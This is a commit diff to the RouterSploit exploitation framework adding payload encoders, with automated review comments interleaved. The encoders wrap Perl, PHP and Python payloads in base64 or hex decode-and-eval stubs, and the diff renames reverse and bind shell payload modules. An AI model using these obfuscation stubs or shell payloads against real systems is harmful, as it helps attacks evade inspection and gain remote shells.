Unverified Commit e29ba771 by Marcin Bury Committed by GitHub

Encoders (#472)

* Initial work on encoders

* Adding tests and docs to initial encoders
parent b925c019
## Description
Module encodes Perl payload to base64 format.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use encoders/perl/base64`
3. Do: `show info`
## Scenarios
```
rsf > use encoders/perl/base64
rsf (Perl Base64 Encoder) > show info
Name:
Perl Base64 Encoder
Description:
Module encodes PERL payload to Base64 format.
Authors:
- Marcin Bury <marcin[at]threat9.com>
```
## Description
Module encodes PHP payload to base64 format.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use encoders/php/base64`
3. Do: `show info`
## Scenarios
```
rsf > use encoders/php/base64
rsf (PHP Base64 Encoder) > show info
Name:
PHP Base64 Encoder
Description:
Module encodes PHP payload to Base64 format.
Authors:
- Marcin Bury <marcin[at]threat9.com>
```
## Description
Module encodes PHP payload to Hex format.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use encoders/php/hex`
3. Do: `show info`
## Scenarios
```
rsf > use encoders/php/hex
rsf (PHP Hex Encoder) > show info
Name:
PHP Hex Encoder
Description:
Module encodes PHP payload to Hex format.
Authors:
- Marcin Bury <marcin[at]threat9.com>
```
## Description
Module encodes Python payload to base64 format.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use encoders/python/base64`
3. Do: `show info`
## Scenarios
```
rsf > use encoders/python/base64
rsf (Python Base64 Encoder) > show info
Name:
Python Base64 Encoder
Description:
Module encodes Python payload to Base64 format.
Authors:
- Marcin Bury <marcin[at]threat9.com>
```
from routersploit.core.exploit.exploit import (
BaseExploit,
)
from routersploit.core.exploit.printer import (
print_error,
)
class BaseEncoder(BaseExploit):
architecture = None
def __init__(self):
self.module_name = self.__module__.replace("routersploit.modules.encoders.", "").replace(".", "/")
def encode(self):
raise NotImplementedError("Please implement 'encode()' method")
def run(self):
print_error("Module cannot be run")
def __str__(self):
return self.module_name
def __format__(self, form):
return format(self.module_name, form)
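Review bot: `BaseEncoder.encode(self)` declares no `payload` parameter, while every concrete `Encoder.encode(self, payload)` added in this commit and the call `self.encoder.encode(payload)` in `GenericPayload.run` pass one, so the abstract stub documents the wrong contract; make it `def encode(self, payload):` and keep the `NotImplementedError`. `__init__` also never calls `super(BaseEncoder, self).__init__()`, so whatever `BaseExploit.__init__` sets up (not visible here) is skipped for encoders. A class docstring would make the role clear, e.g. `"""Base class for payload encoders: subclasses set `architecture` and implement `encode(payload)`, returning the payload wrapped in a decoding stub."""`.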
import os
import importlib
from collections import namedtuple from collections import namedtuple
from struct import pack from struct import pack
from future.utils import with_metaclass from future.utils import with_metaclass
...@@ -24,7 +26,7 @@ from routersploit.core.exploit.utils import ( ...@@ -24,7 +26,7 @@ from routersploit.core.exploit.utils import (
) )
architectures = namedtuple("ArchitectureType", ["ARMLE", "MIPSBE", "MIPSLE", "X86", "X64"]) architectures = namedtuple("ArchitectureType", ["ARMLE", "MIPSBE", "MIPSLE", "X86", "X64", "PERL", "PHP", "PYTHON"])
payload_handlers = namedtuple("PayloadHandlers", ["BIND_TCP", "REVERSE_TCP"]) payload_handlers = namedtuple("PayloadHandlers", ["BIND_TCP", "REVERSE_TCP"])
Architectures = architectures( Architectures = architectures(
...@@ -33,6 +35,9 @@ Architectures = architectures( ...@@ -33,6 +35,9 @@ Architectures = architectures(
MIPSLE="mipsle", MIPSLE="mipsle",
X86="x86", X86="x86",
X64="x64", X64="x64",
PERL="perl",
PHP="php",
PYTHON="python",
) )
PayloadHandlers = payload_handlers( PayloadHandlers = payload_handlers(
...@@ -98,7 +103,10 @@ class BindTCPPayloadMixin(with_metaclass(ExploitOptionsAggregator, object)): ...@@ -98,7 +103,10 @@ class BindTCPPayloadMixin(with_metaclass(ExploitOptionsAggregator, object)):
class BasePayload(BaseExploit): class BasePayload(BaseExploit):
architecture = None
handler = None handler = None
encoder = OptString("", "Encoder")
fmt = None
def __init__(self): def __init__(self):
if self.handler not in PayloadHandlers: if self.handler not in PayloadHandlers:
...@@ -114,14 +122,43 @@ class BasePayload(BaseExploit): ...@@ -114,14 +122,43 @@ class BasePayload(BaseExploit):
def run(self): def run(self):
raise NotImplementedError() raise NotImplementedError()
def get_encoders(self):
path = "routersploit/modules/encoders/{}".format(self.architecture)
class ArchitectureSpecificPayload(BasePayload): encoders = []
architecture = None
output = OptString('python', 'Output type: elf/c/python') try:
filepath = OptString( files = os.listdir(path)
"/tmp/{}".format(random_text(8)), 'Output file to write' except FileNotFoundError:
) return []
for f in files:
if not f.startswith("__") and f.endswith(".py"):
encoder = f.replace(".py", "")
module_path = "{}/{}".format(path, encoder).replace("/", ".")
module = getattr(importlib.import_module(module_path), "Encoder")
encoders.append((
"{}/{}".format(self.architecture, encoder),
module._Encoder__info__["name"],
module._Encoder__info__["description"],
))
return encoders
def get_encoder(self, encoder):
module_path = "routersploit/modules/encoders/{}".format(encoder).replace("/", ".")
try:
module = getattr(importlib.import_module(module_path), "Encoder")
except ImportError:
return None
return module()
class ArchitectureSpecificPayload(BasePayload):
output = OptString("python", "Output type: elf/c/python")
filepath = OptString("/tmp/{}".format(random_text(8)), "Output file to write")
def __init__(self): def __init__(self):
super(ArchitectureSpecificPayload, self).__init__() super(ArchitectureSpecificPayload, self).__init__()
...@@ -144,7 +181,7 @@ class ArchitectureSpecificPayload(BasePayload): ...@@ -144,7 +181,7 @@ class ArchitectureSpecificPayload(BasePayload):
return return
if self.output == "elf": if self.output == "elf":
with open(self.filepath, 'wb+') as f: with open(self.filepath, "wb+") as f:
print_status("Building ELF payload") print_status("Building ELF payload")
content = self.generate_elf(data) content = self.generate_elf(data)
print_success("Saving file {}".format(self.filepath)) print_success("Saving file {}".format(self.filepath))
...@@ -162,6 +199,8 @@ class ArchitectureSpecificPayload(BasePayload): ...@@ -162,6 +199,8 @@ class ArchitectureSpecificPayload(BasePayload):
"No such option as {}".format(self.output) "No such option as {}".format(self.output)
) )
return content
def generate_elf(self, data): def generate_elf(self, data):
elf = self.header + data elf = self.header + data
...@@ -210,6 +249,13 @@ class ArchitectureSpecificPayload(BasePayload): ...@@ -210,6 +249,13 @@ class ArchitectureSpecificPayload(BasePayload):
class GenericPayload(BasePayload): class GenericPayload(BasePayload):
def run(self): def run(self):
print_status("Generating payload") print_status("Generating payload")
print_info(
self.generate() payload = self.generate()
) if self.encoder:
payload = self.encoder.encode(payload)
if self.fmt:
payload = self.fmt.format(payload)
print_info(payload)
return payload
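Review bot: `get_encoder` catches only `ImportError`, but `getattr(importlib.import_module(module_path), "Encoder")` raises `AttributeError` when the imported module has no `Encoder` class (for example `set encoder perl/__init__`), and that escapes `command_set` instead of producing the "Encoder not available" message; use `except (ImportError, AttributeError):`. Neither `get_encoder` nor `get_encoders` compares the loaded encoder's `architecture` with `self.architecture`, so a PHP encoder can be attached to a Perl payload and the generated output is silently wrong; checking `module.architecture == self.architecture` before returning the instance closes that. `get_encoders` also builds `path` relative to the current working directory, which presumably only works when rsf is started from the repository root.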
...@@ -78,7 +78,13 @@ def import_exploit(path): ...@@ -78,7 +78,13 @@ def import_exploit(path):
try: try:
module = importlib.import_module(path) module = importlib.import_module(path)
return getattr(module, "Exploit") if hasattr(module, "Payload"):
return getattr(module, "Payload")
elif hasattr(module, "Encoder"):
return getattr(module, "Encoder")
elif hasattr(module, "Exploit"):
return getattr(module, "Exploit")
except (ImportError, AttributeError, KeyError) as err: except (ImportError, AttributeError, KeyError) as err:
raise RoutersploitException( raise RoutersploitException(
"Error during loading '{}'\n\n" "Error during loading '{}'\n\n"
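Review bot: The new `if`/`elif` chain in `import_exploit` has no final branch, so a module defining none of `Payload`, `Encoder` or `Exploit` now returns `None` from inside the `try` instead of raising; the old `getattr(module, "Exploit")` raised `AttributeError`, which the `except` below converts into a `RoutersploitException` with the loading error message. Keep that behaviour by making the last branch unconditional, `else: return getattr(module, "Exploit")`, or by adding `raise AttributeError("no Payload, Encoder or Exploit class in {}".format(path))` after the chain. `import_exploit` starts before this hunk.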
...@@ -31,6 +31,7 @@ from routersploit.core.exploit.printer import ( ...@@ -31,6 +31,7 @@ from routersploit.core.exploit.printer import (
printer_queue printer_queue
) )
from routersploit.core.exploit.exploit import GLOBAL_OPTS from routersploit.core.exploit.exploit import GLOBAL_OPTS
from routersploit.core.exploit.payloads import BasePayload
import readline import readline
...@@ -207,7 +208,7 @@ class RoutersploitInterpreter(BaseInterpreter): ...@@ -207,7 +208,7 @@ class RoutersploitInterpreter(BaseInterpreter):
self.raw_prompt_template = None self.raw_prompt_template = None
self.module_prompt_template = None self.module_prompt_template = None
self.prompt_hostname = "rsf" self.prompt_hostname = "rsf"
self.show_sub_commands = ("info", "options", "devices", "all", "creds", "exploits", "scanners", "wordlists") self.show_sub_commands = ("info", "options", "devices", "all", "encoders", "creds", "exploits", "scanners", "wordlists")
self.global_commands = sorted(["use ", "exec ", "help", "exit", "show ", "search "]) self.global_commands = sorted(["use ", "exec ", "help", "exit", "show ", "search "])
self.module_commands = ["run", "back", "set ", "setg ", "check"] self.module_commands = ["run", "back", "set ", "setg ", "check"]
...@@ -238,12 +239,13 @@ class RoutersploitInterpreter(BaseInterpreter): ...@@ -238,12 +239,13 @@ class RoutersploitInterpreter(BaseInterpreter):
Join Threat9 Beta Program - https://www.threat9.com Join Threat9 Beta Program - https://www.threat9.com
Exploits: {exploits_count} Scanners: {scanners_count} Creds: {creds_count} Generic: {generic_count} Payloads: {payloads_count} Exploits: {exploits_count} Scanners: {scanners_count} Creds: {creds_count} Generic: {generic_count} Payloads: {payloads_count} Encoders: {encoders_count}
""".format(exploits_count=self.modules_count["exploits"], """.format(exploits_count=self.modules_count["exploits"],
scanners_count=self.modules_count["scanners"], scanners_count=self.modules_count["scanners"],
creds_count=self.modules_count["creds"], creds_count=self.modules_count["creds"],
generic_count=self.modules_count["generic"], generic_count=self.modules_count["generic"],
payloads_count=self.modules_count["payloads"]) payloads_count=self.modules_count["payloads"],
encoders_count=self.modules_count["encoders"])
def __parse_prompt(self): def __parse_prompt(self):
raw_prompt_default_template = "\001\033[4m\002{host}\001\033[0m\002 > " raw_prompt_default_template = "\001\033[4m\002{host}\001\033[0m\002 > "
...@@ -343,6 +345,13 @@ class RoutersploitInterpreter(BaseInterpreter): ...@@ -343,6 +345,13 @@ class RoutersploitInterpreter(BaseInterpreter):
def command_set(self, *args, **kwargs): def command_set(self, *args, **kwargs):
key, _, value = args[0].partition(" ") key, _, value = args[0].partition(" ")
if key in self.current_module.options: if key in self.current_module.options:
if key == "encoder":
value = self.current_module.get_encoder(value)
if not value:
print_error("Encoder not available. Check available encoders with `show encoders`.")
return
setattr(self.current_module, key, value) setattr(self.current_module, key, value)
self.current_module.exploit_attributes[key][0] = value self.current_module.exploit_attributes[key][0] = value
...@@ -451,6 +460,17 @@ class RoutersploitInterpreter(BaseInterpreter): ...@@ -451,6 +460,17 @@ class RoutersploitInterpreter(BaseInterpreter):
print_table(headers, *wordlists, max_column_length=100) print_table(headers, *wordlists, max_column_length=100)
@module_required
def _show_encoders(self, *args, **kwargs):
if issubclass(self.current_module.__class__, BasePayload):
encoders = self.current_module.get_encoders()
if encoders:
headers = ("Encoder", "Name", "Description")
print_table(headers, *encoders, max_column_length=100)
return
print_error("No encoders available")
def __show_modules(self, root=''): def __show_modules(self, root=''):
for module in [module for module in self.modules if module.startswith(root)]: for module in [module for module in self.modules if module.startswith(root)]:
print_info(module.replace('.', os.sep)) print_info(module.replace('.', os.sep))
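Review bot: `_show_encoders` tests `issubclass(self.current_module.__class__, BasePayload)`; the idiomatic form is `isinstance(self.current_module, BasePayload)`, and the same test is missing in `command_set`, which calls `self.current_module.get_encoder(value)` whenever the selected module has an option named `encoder`, so a non-payload module with such an option would raise `AttributeError` there. Guarding with `if key == "encoder" and isinstance(self.current_module, BasePayload):` keeps the special case to payloads. If `command_setg` (outside this hunk) applies options the same way, it presumably needs the same resolution, otherwise `setg encoder ...` stores the raw string.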
from base64 import b64encode
from routersploit.core.exploit.encoders import BaseEncoder
from routersploit.core.exploit.payloads import Architectures
class Encoder(BaseEncoder):
__info__ = {
"name": "Perl Base64 Encoder",
"description": "Module encodes PERL payload to Base64 format.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
architecture = Architectures.PERL
def encode(self, payload):
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "use MIME::Base64;eval(decode_base64('{}'));".format(encoded_payload)
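Review bot: `encode` spells the round-trip as `str(b64encode(bytes(payload, "utf-8")), "utf-8")`, and the PHP Base64, PHP Hex and Python Base64 encoders repeat the same expression verbatim; `b64encode(payload.encode("utf-8")).decode("ascii")` says the same more directly (the output alphabet is ASCII), and the str/bytes conversion could live once in `BaseEncoder` with subclasses supplying only the stub template. A docstring on `encode` would state the contract, e.g. `"""Return *payload* wrapped in a Perl stub that base64-decodes and evals it."""`. `bytes(payload, "utf-8")` raises `TypeError` if a caller passes bytes rather than str, which is acceptable only as long as every `generate()` returns str.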
from base64 import b64encode
from routersploit.core.exploit.encoders import BaseEncoder
from routersploit.core.exploit.payloads import Architectures
class Encoder(BaseEncoder):
__info__ = {
"name": "PHP Base64 Encoder",
"description": "Module encodes PHP payload to Base64 format.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
architecture = Architectures.PHP
def encode(self, payload):
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "eval(base64_decode('{}'));".format(encoded_payload)
from binascii import hexlify
from routersploit.core.exploit.encoders import BaseEncoder
from routersploit.core.exploit.payloads import Architectures
class Encoder(BaseEncoder):
__info__ = {
"name": "PHP Hex Encoder",
"description": "Module encodes PHP payload to Hex format.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
architecture = Architectures.PHP
def encode(self, payload):
encoded_payload = str(hexlify(bytes(payload, "utf-8")), "utf-8")
return "eval(hex2bin('{}'));".format(encoded_payload)
from base64 import b64encode
from routersploit.core.exploit.encoders import BaseEncoder
from routersploit.core.exploit.payloads import Architectures
class Encoder(BaseEncoder):
__info__ = {
"name": "Python Base64 Encoder",
"description": "Module encodes Python payload to Base64 format.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
architecture = Architectures.PYTHON
def encode(self, payload):
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "exec('{}'.decode('base64'))".format(encoded_payload)
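Review bot: The emitted stub `exec('...'.decode('base64'))` only runs under a Python 2 interpreter — in Python 3 `str` has no `decode` method and the `base64` text codec is gone — so the encoder produces a payload that fails on any Python 3 target, while the one-liner payloads' `cmd` option defaults to a bare `python` binary. At minimum the `__info__` description should state the constraint, e.g. `"description": "Module encodes Python payload to Base64 format (decoder stub requires Python 2 on the target).",`, so the operator can see why a run produced nothing.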
...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import ( ...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import (
) )
class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload): class Payload(BindTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = { __info__ = {
"name": "ARMLE Bind TCP", "name": "ARMLE Bind TCP",
"description": "Creates interactive tcp bind shell for ARMLE architecture.", "description": "Creates interactive tcp bind shell for ARMLE architecture.",
...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import ( ...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import (
) )
class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload): class Payload(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = { __info__ = {
"name": "ARMLE Reverse TCP", "name": "ARMLE Reverse TCP",
"description": "Creates interactive tcp reverse shell for ARMLE architecture.", "description": "Creates interactive tcp reverse shell for ARMLE architecture.",
...@@ -2,7 +2,7 @@ from routersploit.core.exploit import * ...@@ -2,7 +2,7 @@ from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload
class Exploit(BindTCPPayloadMixin, GenericPayload): class Payload(BindTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Awk Bind TCP", "name": "Awk Bind TCP",
"description": "Creates an interactive tcp bind shell by using (g)awk.", "description": "Creates an interactive tcp bind shell by using (g)awk.",
...@@ -2,7 +2,7 @@ from routersploit.core.exploit import * ...@@ -2,7 +2,7 @@ from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload
class Exploit(BindTCPPayloadMixin, GenericPayload): class Payload(BindTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Awk Bind UDP", "name": "Awk Bind UDP",
"description": "Creates an interactive udp bind shell by using (g)awk.", "description": "Creates an interactive udp bind shell by using (g)awk.",
...@@ -2,7 +2,7 @@ from routersploit.core.exploit import * ...@@ -2,7 +2,7 @@ from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin
class Exploit(ReverseTCPPayloadMixin, GenericPayload): class Payload(ReverseTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Awk Reverse TCP", "name": "Awk Reverse TCP",
"description": "Creates an interactive tcp reverse shell by using (g)awk.", "description": "Creates an interactive tcp reverse shell by using (g)awk.",
...@@ -2,7 +2,7 @@ from routersploit.core.exploit import * ...@@ -2,7 +2,7 @@ from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin
class Exploit(ReverseTCPPayloadMixin, GenericPayload): class Payload(ReverseTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Bash Reverse TCP", "name": "Bash Reverse TCP",
"description": "Creates interactive tcp reverse shell by using bash.", "description": "Creates interactive tcp reverse shell by using bash.",
...@@ -2,7 +2,7 @@ from routersploit.core.exploit import * ...@@ -2,7 +2,7 @@ from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload
class Exploit(BindTCPPayloadMixin, GenericPayload): class Payload(BindTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Netcat Bind TCP", "name": "Netcat Bind TCP",
"description": "Creates interactive tcp bind shell by using netcat.", "description": "Creates interactive tcp bind shell by using netcat.",
...@@ -2,7 +2,7 @@ from routersploit.core.exploit import * ...@@ -2,7 +2,7 @@ from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin
class Exploit(ReverseTCPPayloadMixin, GenericPayload): class Payload(ReverseTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Netcat Reverse TCP", "name": "Netcat Reverse TCP",
"description": "Creates interactive tcp reverse shell by using netcat.", "description": "Creates interactive tcp reverse shell by using netcat.",
from routersploit.core.exploit import * from routersploit.core.exploit import *
from routersploit.modules.payloads.perl.bind_tcp import Exploit as PerlBindTCP from routersploit.modules.payloads.perl.bind_tcp import Payload as PerlBindTCP
class Exploit(PerlBindTCP): class Payload(PerlBindTCP):
__info__ = { __info__ = {
"name": "Perl Bind TCP One-Liner", "name": "Perl Bind TCP One-Liner",
"description": "Creates interactive tcp bind shell by using perl one-liner.", "description": "Creates interactive tcp bind shell by using perl one-liner.",
...@@ -14,7 +14,6 @@ class Exploit(PerlBindTCP): ...@@ -14,7 +14,6 @@ class Exploit(PerlBindTCP):
cmd = OptString("perl", "Perl binary") cmd = OptString("perl", "Perl binary")
def generate(self): def generate(self):
payload = super(Exploit, self).generate() self.fmt = self.cmd + " -MIO -e \"{}\""
payload = super(Payload, self).generate()
cmd = "{} -MIO -e \"{}\"".format(self.cmd, payload) return payload
return cmd
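Review bot: `generate` now assigns `self.fmt` as a side effect every time it runs, and the Perl reverse, PHP bind/reverse and Python bind/bind-UDP/reverse/reverse-UDP one-liners repeat the pattern; since `fmt` depends only on `self.cmd`, which can change via `set cmd` after construction, a read-only property on the class states the wrapping once and leaves `generate` pure. With the default Base64 encoder the text substituted into `"{}"` contains only base64 characters and `'();`, but if the `encoder` option is cleared the raw Perl source with `$` and `"` lands inside a double-quoted shell argument unescaped; the template should either reject an empty encoder or quote the payload for the shell.
```python
    @property
    def fmt(self):
        """Shell wrapper applied by GenericPayload.run after encoding."""
        return self.cmd + " -MIO -e \"{}\""

    def generate(self):
        return super(Payload, self).generate()
```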
from routersploit.core.exploit import * from routersploit.core.exploit import *
from routersploit.modules.payloads.perl.reverse_tcp import Exploit as PerlReverseTCP from routersploit.modules.payloads.perl.reverse_tcp import Payload as PerlReverseTCP
class Exploit(PerlReverseTCP): class Payload(PerlReverseTCP):
__info__ = { __info__ = {
"name": "Perl Reverse TCP One-Liner", "name": "Perl Reverse TCP One-Liner",
"description": "Creates interactive tcp reverse shell by using perl one-liner.", "description": "Creates interactive tcp reverse shell by using perl one-liner.",
...@@ -14,7 +14,6 @@ class Exploit(PerlReverseTCP): ...@@ -14,7 +14,6 @@ class Exploit(PerlReverseTCP):
cmd = OptString("perl", "Perl binary") cmd = OptString("perl", "Perl binary")
def generate(self): def generate(self):
payload = super(Exploit, self).generate() self.fmt = self.cmd + " -MIO -e \"{}\""
payload = super(Payload, self).generate()
cmd = "{} -MIO -e \"{}\"".format(self.cmd, payload) return payload
return cmd
from routersploit.core.exploit import * from routersploit.core.exploit import *
from routersploit.modules.payloads.php.bind_tcp import Exploit as PHPBindTCP from routersploit.modules.payloads.php.bind_tcp import Payload as PHPBindTCP
class Exploit(PHPBindTCP): class Payload(PHPBindTCP):
__info__ = { __info__ = {
"name": "PHP Bind TCP One-Liner", "name": "PHP Bind TCP One-Liner",
"description": "Creates interactive tcp bind shell by using php one-liner.", "description": "Creates interactive tcp bind shell by using php one-liner.",
...@@ -14,7 +14,6 @@ class Exploit(PHPBindTCP): ...@@ -14,7 +14,6 @@ class Exploit(PHPBindTCP):
cmd = OptString("php", "PHP binary") cmd = OptString("php", "PHP binary")
def generate(self): def generate(self):
payload = super(Exploit, self).generate() self.fmt = self.cmd + ' -r "{}"'
payload = super(Payload, self).generate()
cmd = '{} -r "{}"'.format(self.cmd, payload) return payload
return cmd
from routersploit.core.exploit import * from routersploit.core.exploit import *
from routersploit.modules.payloads.php.reverse_tcp import Exploit as PHPReverseTCP from routersploit.modules.payloads.php.reverse_tcp import Payload as PHPReverseTCP
class Exploit(PHPReverseTCP): class Payload(PHPReverseTCP):
__info__ = { __info__ = {
"name": "PHP Reverse TCP One-Liner", "name": "PHP Reverse TCP One-Liner",
"description": "Creates interactive tcp reverse shell by using php one-liner.", "description": "Creates interactive tcp reverse shell by using php one-liner.",
...@@ -14,7 +14,6 @@ class Exploit(PHPReverseTCP): ...@@ -14,7 +14,6 @@ class Exploit(PHPReverseTCP):
cmd = OptString("php", "PHP binary") cmd = OptString("php", "PHP binary")
def generate(self): def generate(self):
payload = super(Exploit, self).generate() self.fmt = self.cmd + ' -r "{}"'
payload = super(Payload, self).generate()
cmd = '{} -r "{}"'.format(self.cmd, payload) return payload
return cmd
from routersploit.core.exploit import * from routersploit.core.exploit import *
from routersploit.modules.payloads.python.bind_tcp import Exploit as PythonBindTCP from routersploit.modules.payloads.python.bind_tcp import Payload as PythonBindTCP
class Exploit(PythonBindTCP): class Payload(PythonBindTCP):
__info__ = { __info__ = {
"name": "Python Reverse TCP One-Liner", "name": "Python Reverse TCP One-Liner",
"description": "Creates interactive tcp bind shell by using python one-liner.", "description": "Creates interactive tcp bind shell by using python one-liner.",
...@@ -14,7 +14,6 @@ class Exploit(PythonBindTCP): ...@@ -14,7 +14,6 @@ class Exploit(PythonBindTCP):
cmd = OptString("python", "Python binary") cmd = OptString("python", "Python binary")
def generate(self): def generate(self):
payload = super(Exploit, self).generate() self.fmt = self.cmd + ' -c "{}"'
payload = super(Payload, self).generate()
cmd = '{} -c "{}"'.format(self.cmd, payload) return payload
return cmd
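Review bot: `__info__["name"]` reads "Python Reverse TCP One-Liner" for a class that subclasses `PythonBindTCP` and whose description says bind shell; the rename to `Payload` leaves that mismatch in place, so `show info` and the payload listing label it wrong. `"name": "Python Bind TCP One-Liner",` matches the naming of the UDP sibling.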
from routersploit.core.exploit import * from routersploit.core.exploit import *
from routersploit.modules.payloads.python.bind_udp import Exploit as PythonBindUDP from routersploit.modules.payloads.python.bind_udp import Payload as PythonBindUDP
class Exploit(PythonBindUDP): class Payload(PythonBindUDP):
__info__ = { __info__ = {
"name": "Python Bind UDP One-Liner", "name": "Python Bind UDP One-Liner",
"description": "Creates interactive udp bind shell by using python one-liner.", "description": "Creates interactive udp bind shell by using python one-liner.",
...@@ -14,7 +14,6 @@ class Exploit(PythonBindUDP): ...@@ -14,7 +14,6 @@ class Exploit(PythonBindUDP):
cmd = OptString("python", "Python binary") cmd = OptString("python", "Python binary")
def generate(self): def generate(self):
payload = super(Exploit, self).generate() self.fmt = self.cmd + ' -c "{}"'
payload = super(Payload, self).generate()
cmd = '{} -c "{}"'.format(self.cmd, payload) return payload
return cmd
from routersploit.core.exploit import * from routersploit.core.exploit import *
from routersploit.modules.payloads.python.reverse_tcp import Exploit as PythonReverseTCP from routersploit.modules.payloads.python.reverse_tcp import Payload as PythonReverseTCP
class Exploit(PythonReverseTCP): class Payload(PythonReverseTCP):
__info__ = { __info__ = {
"name": "Python Reverse TCP One-Liner", "name": "Python Reverse TCP One-Liner",
"description": "Creates interactive tcp reverse shell by using python one-liner.", "description": "Creates interactive tcp reverse shell by using python one-liner.",
...@@ -14,7 +14,6 @@ class Exploit(PythonReverseTCP): ...@@ -14,7 +14,6 @@ class Exploit(PythonReverseTCP):
cmd = OptString("python", "Python binary") cmd = OptString("python", "Python binary")
def generate(self): def generate(self):
payload = super(Exploit, self).generate() self.fmt = self.cmd + ' -c "{}"'
payload = super(Payload, self).generate()
cmd = '{} -c "{}"'.format(self.cmd, payload) return payload
return cmd
from routersploit.core.exploit import * from routersploit.core.exploit import *
from routersploit.modules.payloads.python.reverse_udp import Exploit as PythonBindUDP from routersploit.modules.payloads.python.reverse_udp import Payload as PythonBindUDP
class Exploit(PythonBindUDP): class Payload(PythonBindUDP):
__info__ = { __info__ = {
"name": "Python Reverse UDP One-Liner", "name": "Python Reverse UDP One-Liner",
"description": "Creates interactive udp reverse shell by using python one-liner.", "description": "Creates interactive udp reverse shell by using python one-liner.",
...@@ -14,7 +14,6 @@ class Exploit(PythonBindUDP): ...@@ -14,7 +14,6 @@ class Exploit(PythonBindUDP):
cmd = OptString("python", "Python binary") cmd = OptString("python", "Python binary")
def generate(self): def generate(self):
payload = super(Exploit, self).generate() self.fmt = self.cmd + ' -c "{}"'
payload = super(Payload, self).generate()
cmd = '{} -c "{}"'.format(self.cmd, payload) return payload
return cmd
...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import ( ...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import (
) )
class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload): class Payload(BindTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = { __info__ = {
"name": "MIPSBE Bind TCP", "name": "MIPSBE Bind TCP",
"description": "Creates interactive tcp bind shell for MIPSBE architecture.", "description": "Creates interactive tcp bind shell for MIPSBE architecture.",
...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import ( ...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import (
) )
class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload): class Payload(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = { __info__ = {
"name": "MIPSBE Reverse TCP", "name": "MIPSBE Reverse TCP",
"description": "Creates interactive tcp reverse shell for MIPSBE architecture.", "description": "Creates interactive tcp reverse shell for MIPSBE architecture.",
...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import ( ...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import (
) )
class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload): class Payload(BindTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = { __info__ = {
"name": "MIPSLE Bind TCP", "name": "MIPSLE Bind TCP",
"description": "Creates interactive tcp bind shell for MIPSLE architecture.", "description": "Creates interactive tcp bind shell for MIPSLE architecture.",
...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import ( ...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import (
) )
class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload): class Payload(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = { __info__ = {
"name": "MIPSLE Reverse TCP", "name": "MIPSLE Reverse TCP",
"description": "Creates interactive tcp reverse shell for MIPSLE architecture.", "description": "Creates interactive tcp reverse shell for MIPSLE architecture.",
from base64 import b64encode from routersploit.core.exploit.option import OptString
from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload from routersploit.core.exploit.payloads import (
GenericPayload,
Architectures,
BindTCPPayloadMixin,
)
from routersploit.modules.encoders.perl.base64 import Encoder
class Exploit(BindTCPPayloadMixin, GenericPayload): class Payload(BindTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Perl Bind TCP", "name": "Perl Bind TCP",
"description": "Creates interactive tcp bind shell by using perl.", "description": "Creates interactive tcp bind shell by using perl.",
